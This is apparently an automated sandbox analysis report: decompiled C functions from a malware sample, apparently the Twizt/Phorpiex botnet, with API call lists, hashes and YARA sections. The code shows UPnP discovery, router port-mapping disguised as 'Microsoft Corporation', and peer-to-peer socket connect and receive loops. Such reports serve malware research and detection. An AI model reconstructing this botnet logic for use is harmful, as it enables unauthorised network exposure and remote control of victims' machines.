                                                                                  • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                  • String ID:
                                                                                  • API String ID: 3980219359-0
                                                                                  • Opcode ID: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction ID: 6c80b279ed5ca581be7c80171f6d45ff8cd2583a00b65cb27f0af65c826a2fd4
                                                                                  • Opcode Fuzzy Hash: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction Fuzzy Hash: 252181B1504301AFD304DF65D884A6BB7E9EFD4314F008A3EF859D2280E774D9488BAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E00405520(intOrPtr _a4) {
                                                                                  				intOrPtr _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				void* _v32;
                                                                                  				short _v36;
                                                                                  				char _v40;
                                                                                  				intOrPtr _t95;
                                                                                  				void* _t101;
                                                                                  				void* _t103;
                                                                                  				intOrPtr _t110;
                                                                                  				void* _t118;
                                                                                  				void* _t122;
                                                                                  				void* _t199;
                                                                                  				void* _t200;
                                                                                  
                                                                                  				_v28 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v20 = 0;
                                                                                  				while(1) {
                                                                                  					_t95 = E004054D0(0x411e90, 0x411ea0); // executed
                                                                                  					_t200 = _t199 + 8;
                                                                                  					_v28 = _t95;
                                                                                  					if(_v28 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_push( &_v32);
                                                                                  					_push(_v28);
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {
                                                                                  						_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))(_v32,  &_v16); // executed
                                                                                  						if(_t101 == 0) {
                                                                                  							_t103 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))(_v16,  &_v36); // executed
                                                                                  							if(_t103 == 0) {
                                                                                  								if(_v36 == 0xffffffff) {
                                                                                  									_push( &_v12);
                                                                                  									_push(_v16);
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {
                                                                                  										_push( &_v24);
                                                                                  										_push(_a4);
                                                                                  										_push(_v12);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {
                                                                                  											_t110 = E004054D0(0x411eb0, 0x411ec0);
                                                                                  											_t199 = _t200 + 8;
                                                                                  											_v24 = _t110;
                                                                                  											if(_v24 != 0) {
                                                                                  												__imp__#2(L"Microsoft Corporation");
                                                                                  												_v8 = _t110;
                                                                                  												if(_v8 != 0) {
                                                                                  													_push(_v8);
                                                                                  													_push(_v24);
                                                                                  													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {
                                                                                  														_push(_a4);
                                                                                  														_push(_v24);
                                                                                  														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {
                                                                                  															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  															if(_t118 == 0) {
                                                                                  																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);
                                                                                  																_t118 = 0;
                                                                                  																if(0 != 0) {
                                                                                  																	continue;
                                                                                  																}
                                                                                  																L34:
                                                                                  																if(_v20 != 0) {
                                                                                  																	_t118 = E00408FB0(_v20);
                                                                                  																}
                                                                                  																if(_v8 != 0) {
                                                                                  																	__imp__#6(_v8);
                                                                                  																}
                                                                                  																if(_v24 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                  																}
                                                                                  																if(_v12 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                  																}
                                                                                  																if(_v16 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                  																}
                                                                                  																if(_v32 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                  																}
                                                                                  																if(_v28 == 0) {
                                                                                  																	return _t118;
                                                                                  																} else {
                                                                                  																	_t122 =  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28); // executed
                                                                                  																	return _t122;
                                                                                  																}
                                                                                  															}
                                                                                  															goto L34;
                                                                                  														}
                                                                                  														goto L34;
                                                                                  													}
                                                                                  													goto L34;
                                                                                  												}
                                                                                  												goto L34;
                                                                                  											}
                                                                                  											goto L34;
                                                                                  										}
                                                                                  										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);
                                                                                  										if(_t118 == 0) {
                                                                                  											if(_v36 != 0xffffffff) {
                                                                                  												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  											} else {
                                                                                  												_v40 = 0;
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);
                                                                                  												if(_t118 == 0 && _v40 != 0) {
                                                                                  													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  												}
                                                                                  											}
                                                                                  										}
                                                                                  										goto L34;
                                                                                  									}
                                                                                  									goto L34;
                                                                                  								}
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							goto L34;
                                                                                  						}
                                                                                  						goto L34;
                                                                                  					}
                                                                                  					goto L34;
                                                                                  				}
                                                                                  				goto L34;
                                                                                  			}

                                                                                  APIs
                                                                                    • Part of subcall function 004054D0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004054F0
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFreeInstanceString
                                                                                  • String ID: Microsoft Corporation
                                                                                  • API String ID: 586785272-3838278685
                                                                                  • Opcode ID: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction ID: b68b7a3bc5298b5c42a29c8e1873351d80abb6d03bdfce163c93a33f9d118317
                                                                                  • Opcode Fuzzy Hash: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction Fuzzy Hash: 0991FA75A0050ADFCB04DB98C994AAFB7B5EF88300F208169E505B73A0D739AE41DF69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040D3D0() {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v12;
                                                                                  				signed int _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t26;
                                                                                  				intOrPtr _t31;
                                                                                  				void* _t36;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				__imp__CoInitializeEx(0, 2); // executed
                                                                                  				_v12 = 0;
                                                                                  				_t20 = E0040C930( &_v12,  &_v12); // executed
                                                                                  				_t37 = _t36 + 4;
                                                                                  				_v8 = _t20;
                                                                                  				if(_v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_t20 = E0040CFE0( *((intOrPtr*)(_v12 + _v16 * 4)));
                                                                                  						_t37 = _t37 + 4;
                                                                                  						 *0x414e7c = _t20;
                                                                                  						if( *0x414e7c == 0) {
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						}
                                                                                  						_v20 = E00409880();
                                                                                  						_t31 =  *0x414e7c; // 0x0
                                                                                  						E0040D350(_t31, _t31, "TCP", 0x9e34, _v20);
                                                                                  						_t26 =  *0x414e7c; // 0x0
                                                                                  						_t20 = E0040D350(_t31, _t26, "UDP", 0x9e34, _v20);
                                                                                  						_t37 = _t37 + 0x20;
                                                                                  						break;
                                                                                  					}
                                                                                  					return E004090D0(_t20, _v8, _v12, _v8);
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}

                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,?,0040686F), ref: 0040D3DA
                                                                                    • Part of subcall function 0040C930: socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
                                                                                    • Part of subcall function 0040C930: htons.WS2_32(0000076C), ref: 0040C980
                                                                                    • Part of subcall function 0040C930: inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
                                                                                    • Part of subcall function 0040C930: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
                                                                                    • Part of subcall function 0040C930: bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
                                                                                    • Part of subcall function 0040C930: lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
                                                                                    • Part of subcall function 0040C930: sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
                                                                                    • Part of subcall function 0040C930: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
                                                                                    • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
                                                                                    • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                  • String ID: TCP$UDP
                                                                                  • API String ID: 1519345861-1097902612
                                                                                  • Opcode ID: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
                                                                                  • Instruction ID: 198a483ec780ca398c4dd107ec41d4ae9ae4b932ff6ccac9155d2369ff036123
                                                                                  • Opcode Fuzzy Hash: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
                                                                                  • Instruction Fuzzy Hash: 5A11B4B4D00208EBDB00EBE4D845FAE7774BB44304F10856AE511773C2D7796A58CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 86%
                                                                                  			E0040BAB0(LONG* _a4, intOrPtr _a8) {
                                                                                  				char _v5;
                                                                                  				intOrPtr _v12;
                                                                                  				signed int _v13;
                                                                                  				char _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _t38;
                                                                                  				signed char _t43;
                                                                                  				signed char _t48;
                                                                                  				intOrPtr _t49;
                                                                                  				signed char _t53;
                                                                                  				intOrPtr _t72;
                                                                                  				void* _t80;
                                                                                  				void* _t81;
                                                                                  				void* _t84;
                                                                                  
                                                                                  				if(InterlockedExchangeAdd(_a4, 0) == 0) {
                                                                                  					_v5 = 0;
                                                                                  					_t38 = E0040B9C0(_t37, _a4[1]); // executed
                                                                                  					_t81 = _t80 + 4;
                                                                                  					_v12 = _t38;
                                                                                  					if(_v12 == 0xffffffff) {
                                                                                  						L18:
                                                                                  						return _v5;
                                                                                  					}
                                                                                  					InterlockedIncrement(_a4);
                                                                                  					while(1) {
                                                                                  						_t72 =  *0x414e6c; // 0xe9ca09cc
                                                                                  						_t43 = E0040A390(_v12, 0, _t72, 0, _a8, E0040B890, 0);
                                                                                  						_t81 = _t81 + 0x1c;
                                                                                  						_t63 = _t43 & 0x000000ff;
                                                                                  						if((_t43 & 0x000000ff) == 0) {
                                                                                  							break;
                                                                                  						}
                                                                                  						_v13 = 1;
                                                                                  						while((_v13 & 0x000000ff) != 0) {
                                                                                  							_v13 = 0;
                                                                                  							_t48 = E0040B8F0(_v12,  &_v20, 4, 0x2710);
                                                                                  							_t81 = _t81 + 0x10;
                                                                                  							if((_t48 & 0x000000ff) == 0 || _v20 == 0) {
                                                                                  								L15:
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_t49 = E00408E60(_v20);
                                                                                  								_t81 = _t81 + 4;
                                                                                  								_v24 = _t49;
                                                                                  								if(_v24 != 0) {
                                                                                  									_t53 = E0040B8F0(_v12, _v24, _v20, E0040BA50(_v20));
                                                                                  									_t84 = _t81 + 0x14;
                                                                                  									if((_t53 & 0x000000ff) != 0) {
                                                                                  										E0040A4F0(_v12, _v24, _v20, _a4[1], E0040B890, 0, 0);
                                                                                  										_t84 = _t84 + 0x1c;
                                                                                  										_v13 = 1;
                                                                                  									}
                                                                                  									E00408FB0(_v24);
                                                                                  									_t81 = _t84 + 4;
                                                                                  									goto L15;
                                                                                  								}
                                                                                  								break;
                                                                                  							}
                                                                                  						}
                                                                                  						_v5 = 1;
                                                                                  						if(0 != 0) {
                                                                                  							continue;
                                                                                  						}
                                                                                  						L17:
                                                                                  						InterlockedDecrement(_a4);
                                                                                  						E00409940(_v12);
                                                                                  						goto L18;
                                                                                  					}
                                                                                  					E00409820(_t63, _a4[1]);
                                                                                  					_t81 = _t81 + 4;
                                                                                  					goto L17;
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}

                                                                                  APIs
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040BABC
                                                                                  • InterlockedIncrement.KERNEL32(000000FF), ref: 0040BAF1
                                                                                  • InterlockedDecrement.KERNEL32(000000FF), ref: 0040BBF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementExchangeIncrement
                                                                                  • String ID:
                                                                                  • API String ID: 2813130747-0
                                                                                  • Opcode ID: d66568f139b97b9250529c06a7e49fffa48baefe54cd5369e31c2569c1624458
                                                                                  • Instruction ID: 3c78adec81f77e8e7fdd20323f227dc686b9dedf38b32a9f5f72fcc304b9c136
                                                                                  • Opcode Fuzzy Hash: d66568f139b97b9250529c06a7e49fffa48baefe54cd5369e31c2569c1624458
                                                                                  • Instruction Fuzzy Hash: 3241B3B5A00208ABDF00EAA5DC45BAF7774AB44304F04856DF505BB2C2E779EA01C7ED
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040A1A0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v9;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _t23;
                                                                                  
                                                                                  				_t23 = E0040ABD0(__ecx); // executed
                                                                                  				 *((intOrPtr*)(_a8 + 4)) = _t23;
                                                                                  				_t4 = _a8 + 0x14; // 0x1023d00
                                                                                  				 *_a8 = E00409180(_a8 + 4,  *_t4 + 0x14);
                                                                                  				_v9 = 0;
                                                                                  				_t9 = _a8 + 0x14; // 0x1023d00
                                                                                  				_v16 =  *_t9 + 0x18;
                                                                                  				_v8 = E0040AE60( *_t9 + 0x18, "Twizt", lstrlenA("Twizt"), _a8, _v16);
                                                                                  				if(_v8 != 0) {
                                                                                  					_v9 = _a12(_a4, _v8, _v16, _a16);
                                                                                  					E00408FB0(_v8);
                                                                                  				}
                                                                                  				return _v9;
                                                                                  			}

APIs
• lstrlenA.KERNEL32(Twizt,0040C329,0040C329,?,?,0040C329,00000000,0040C329,0040C329,00000000,00000000), ref: 0040A1EC
Strings
Memory Dump Source
• Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
Yara matches
Similarity
• API ID: lstrlen
• String ID: Twizt$Twizt
• API String ID: 1659193697-16428492
• Opcode ID: d2777426fe4f895c35d30f5f867fe7ea5fb9450d2a450df474408235e216b6ac
• Instruction ID: 51e17fc92645e8ce827fbf7df6250645f897da73d1b61dcc158797575a8342f0
• Opcode Fuzzy Hash: d2777426fe4f895c35d30f5f867fe7ea5fb9450d2a450df474408235e216b6ac
• Instruction Fuzzy Hash: 2C113075900108BFCB04DF98D841E9EBB75AF48304F14C1A9FD19AB342D635EA10CBA6
Uniqueness

Uniqueness Score: -1.00%

APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 0040B9D3
• htons.WS2_32(00009E34), ref: 0040BA05
• connect.WS2_32(000000FF,?,00000010), ref: 0040BA1F
  • Part of subcall function 00409940: shutdown.WS2_32(0040992D,00000002), ref: 00409949
  • Part of subcall function 00409940: closesocket.WS2_32(0040992D), ref: 00409953
Memory Dump Source
• Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
Yara matches
Similarity
• API ID: closesocketconnecthtonsshutdownsocket
• String ID:
• API String ID: 1987800339-0
• Opcode ID: e302ac02c00c680b9bd5bbb7eef578896a586a72e60fad90fd638c416b6389a6
• Instruction ID: 0afc104acbc2a1c2722e6414f741f2353ed594099cbcebe19ef64c9892d1b102
• Opcode Fuzzy Hash: e302ac02c00c680b9bd5bbb7eef578896a586a72e60fad90fd638c416b6389a6
• Instruction Fuzzy Hash: 63113CB4E14309EBCF10DFA4D9096AEB670EF04320F2042A9F525A73D0D7744F019B99
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
E00408D00(void* __ecx) {
	char _v8;
	signed char _t5;
	long _t7;
	signed char _t9;
	signed char _t10;

	if((E00408B90() & 0x000000ff) == 0) {
		L2:
		_t5 = HeapCreate(0, 0, 0); // executed
		 *0x414414 = _t5;
		if( *0x414414 != 0) {
			_v8 = 2;
			_t9 =  *0x414414; // 0x930000
			__imp__HeapSetInformation(_t9, 0,  &_v8, 4);
			_t7 = GetCurrentProcessId();
			 *0x414e48 = _t7;
			return _t7;
		}
	} else {
		_t10 =  *0x414414; // 0x930000
		_t5 = E00408C70(_t10);
		if((_t5 & 0x000000ff) == 0) {
			goto L2;
		}
	}
	return _t5;
}

Line addresses: 0x00408d0e, 0x00408d26, 0x00408d2c, 0x00408d32, 0x00408d3e, 0x00408d40, 0x00408d4f, 0x00408d56, 0x00408d5c, 0x00408d62, 0x00000000, 0x00408d62, 0x00408d10, 0x00408d10, 0x00408d17, 0x00408d24, 0x00000000, 0x00000000, 0x00408d24, 0x00408d6a

APIs
  • Part of subcall function 00408B90: GetCurrentProcessId.KERNEL32(?,00408DAB,?,0040B33E,00000010,?,?,?,?,?,?,0040B45B), ref: 00408B93
• HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00408DB7,?,0040B33E,00000010,?,?,?,?,?,?,0040B45B), ref: 00408D2C
• HeapSetInformation.KERNEL32(00930000,00000000,00000002,00000004), ref: 00408D56
• GetCurrentProcessId.KERNEL32 ref: 00408D5C
  • Part of subcall function 00408C70: GetProcessHeaps.KERNEL32(000000FF,?), ref: 00408C8C
Memory Dump Source
• Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
Yara matches
Similarity
• API ID: Process$CurrentHeap$CreateHeapsInformation
• String ID:
• API String ID: 3179415709-0
• Opcode ID: 8cf13a9f05b6669887cfc933ed30433b164df7621b61a2dd6ef65711bd196f76
• Instruction ID: 8bdf3cca161eb603aec6aeb6121799ecf35629f53a577dba7e6e256eef3a136c
• Opcode Fuzzy Hash: 8cf13a9f05b6669887cfc933ed30433b164df7621b61a2dd6ef65711bd196f76
• Instruction Fuzzy Hash: 13F0BBB0540318ABE324DB61FE05B663769A754705F00C13DF640A62D1DF79E504C76D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00408DA0(void* __ecx, void* __edx, intOrPtr _a4, long _a8) {
	int _v8;
	intOrPtr _v12;
	void* _v16;
	void* _t23;
	void* _t30;
	void* _t33;

	_t30 = __ecx;
	if((E00408B90() & 0x000000ff) == 0) {
		E00408D00(_t30); // executed
	}
	_v8 = 0;
	if(_a4 != 0) {
		_v12 = E00408B50(_a4 + 2, 4);
		_t33 =  *0x414414; // 0x930000
		_t23 = RtlAllocateHeap(_t33, _a8, _v12 + 0xc); // executed
		_v16 = _t23;
		if(_v16 != 0) {
			_v8 = E00408D70(_v16, _v12);
			if((_a8 & 0x00000008) == 0) {
				memset(_v8 + _a4, 0, _v12 - _a4);
			}
		}
	}
	return _v8;
}

Line addresses: 0x00408da0, 0x00408db0, 0x00408db2, 0x00408db2, 0x00408db7, 0x00408dc2, 0x00408dd5, 0x00408de3, 0x00408dea, 0x00408df0, 0x00408df7, 0x00408e09, 0x00408e12, 0x00408e24, 0x00408e29, 0x00408e12, 0x00408df7, 0x00408e32

APIs
  • Part of subcall function 00408B90: GetCurrentProcessId.KERNEL32(?,00408DAB,?,0040B33E,00000010,?,?,?,?,?,?,0040B45B), ref: 00408B93
• RtlAllocateHeap.NTDLL(00930000,?,-0000000C), ref: 00408DEA
• memset.NTDLL ref: 00408E24
  • Part of subcall function 00408D00: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00408DB7,?,0040B33E,00000010,?,?,?,?,?,?,0040B45B), ref: 00408D2C
  • Part of subcall function 00408D00: HeapSetInformation.KERNEL32(00930000,00000000,00000002,00000004), ref: 00408D56
  • Part of subcall function 00408D00: GetCurrentProcessId.KERNEL32 ref: 00408D5C
Memory Dump Source
• Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
Yara matches
Similarity
• API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
• String ID:
• API String ID: 3494217179-0
• Opcode ID: badde77dfdf40572ef0a3e86c64e640400ab749034a28f8520fe5de1279b3f2f
• Instruction ID: c75194c1b737f1735b46638b4685076338f686d797c7d839f6f9c907a18bfdff
• Opcode Fuzzy Hash: badde77dfdf40572ef0a3e86c64e640400ab749034a28f8520fe5de1279b3f2f
• Instruction Fuzzy Hash: 551152B1D00108FBCB10EFA5D945B9E7BB4AF44304F10C16DF544AB381EA389E44CB98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E0040C2C0(void* __ecx, void* __edi) {
	intOrPtr* _v8;
	LONG* _v12;
	short _v16;
	long _v20;
	void* __ebx;
	intOrPtr* _t13;
	LONG* _t14;
	void* _t23;
	intOrPtr _t27;
	void* _t29;
	void* _t30;

	_t28 = __edi;
	_t23 = __ecx;
	_push(0);
	_t13 = E0040E110(__edi);
	_t30 = _t29 + 4;
	_v8 = _t13;
	if(_v8 != 0) {
		do {
			_t14 = E00409F60(_t23); // executed
			_v12 = _t14;
			if(_v12 != 0 && InterlockedExchangeAdd(_v12, 0) == 0) {
				_v20 = _v12[1];
				_v16 = 0x9e34;
				_t27 =  *0x414e6c; // 0xe9ca09cc
				E0040A390(_v8, 0, _t27, 0, 0, E0040C240,  &_v20); // executed
				_t30 = _t30 + 0x1c;
			}
			_t23 =  *0x414e64; // 0x52c
		} while (WaitForSingleObject(_t23, 0x1388) == 0x102);
		return E0040E0A0(_v8, _t28);
	}
	return _t13;
}

Line addresses: 0x0040c2c0, 0x0040c2c0, 0x0040c2c7, 0x0040c2c9, 0x0040c2ce, 0x0040c2d1, 0x0040c2d8, 0x0040c2da, 0x0040c2da, 0x0040c2df, 0x0040c2e6, 0x0040c2fe, 0x0040c306, 0x0040c317, 0x0040c324, 0x0040c329, 0x0040c329, 0x0040c331, 0x0040c33e, 0x00000000, 0x0040c348, 0x0040c351

APIs
  • Part of subcall function 0040E110: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040C2CE,00000000), ref: 0040E135
  • Part of subcall function 0040E110: socket.WS2_32(00000002,00000002,00000011), ref: 0040E144
  • Part of subcall function 0040E110: bind.WS2_32(?,?,00000010), ref: 0040E185
  • Part of subcall function 00409F60: EnterCriticalSection.KERNEL32(00414E4C), ref: 00409F70
  • Part of subcall function 00409F60: LeaveCriticalSection.KERNEL32(00414E4C), ref: 00409F9C
• InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040C2EE
• WaitForSingleObject.KERNEL32(0000052C,00001388), ref: 0040C338
Memory Dump Source
• Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
• String ID:
• API String ID: 3920643007-0
• Opcode ID: 0b99e573d8f315015a3dd1e5e97ee7d2eab42a6bfeb1e7241c1c55ca9ad94b3f
• Instruction ID: 8bdc2a01645c520112e94222a2c7a5a1540a7fb89cef399606225106f8c8f3ff
• Opcode Fuzzy Hash: 0b99e573d8f315015a3dd1e5e97ee7d2eab42a6bfeb1e7241c1c55ca9ad94b3f
• Instruction Fuzzy Hash: 12018870E00308EBD700EBE5DC86B9E7774EB48704F508579E500BB2D2D679AE50C758
Uniqueness

Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 37%
                                                                                  			E00409AB0(intOrPtr _a4) {
                                                                                  				char _v260;
                                                                                  				char _v261;
                                                                                  				int _v268;
                                                                                  				signed int _v272;
                                                                                  				int _t23;
                                                                                  
                                                                                  				_v261 = 0;
                                                                                  				_t23 = gethostname( &_v260, 0x100); // executed
                                                                                  				if(_t23 != 0xffffffff) {
                                                                                  					__imp__#52( &_v260); // executed
                                                                                  					_v268 = _t23;
                                                                                  					if(_v268 != 0) {
                                                                                  						_v272 = 0;
                                                                                  						while( *((intOrPtr*)( *((intOrPtr*)(_v268 + 0xc)) + _v272 * 4)) != 0) {
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v268 + 0xc)) + _v272 * 4)))) != _a4) {
                                                                                  								_v272 = _v272 + 1;
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_v261 = 1;
                                                                                  							}
                                                                                  							goto L8;
                                                                                  						}
                                                                                  					}
                                                                                  				}
